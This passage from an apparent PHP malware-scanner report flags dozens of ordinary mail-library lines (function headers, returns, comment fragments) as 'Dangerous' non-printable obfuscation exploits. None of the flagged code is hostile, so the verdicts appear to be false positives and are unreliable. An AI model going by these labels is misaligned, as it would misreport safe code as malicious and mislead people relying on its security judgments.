<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1814</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1877</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2011</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2078</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2662</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2678</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2722</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2757</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2787</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
